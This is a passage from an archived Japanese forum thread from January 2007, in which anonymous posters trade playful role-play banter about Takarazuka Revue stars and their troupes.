あやねちゃんは何気に実はブラックコーヒーとかのほうが
好きそうな気がするけどね〜
@前スレで彩音ビームで吹っ飛ばされました@わたる性転換済

294 :名無しさん@花束いっぱい。:2007/01/10(水) 14:48:35 ID:1pAO1i9h
わたるお姉様っ!お久しぶりです!@ダッシュでわたるに飛びつくとなみ

おねえ…さま?@ざわつく各人


295 :名無しさん@花束いっぱい。:2007/01/10(水) 22:59:51 ID:Q14IcwoK
ざわつく人々をそっちのけで、自分とこのトップの嫁の言動を
固唾を飲んで見守る月組子
@いま、組の一大事です


どーせいつもの展開だろう。
いっそ、わたるおねーさまを嫁に貰った方が(ry
(心の中の声)
@今だ一線越えたまま、つまらなさそうなアヒ

296 :名無しさん@花束いっぱい。:2007/01/11(木) 01:21:45 ID:CP9tHh+a
いかん、わたるおねーさまをオサさんに見せるな!
すみれちゃんが降臨してしまう!@必死に隠そうとする花組子

83 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)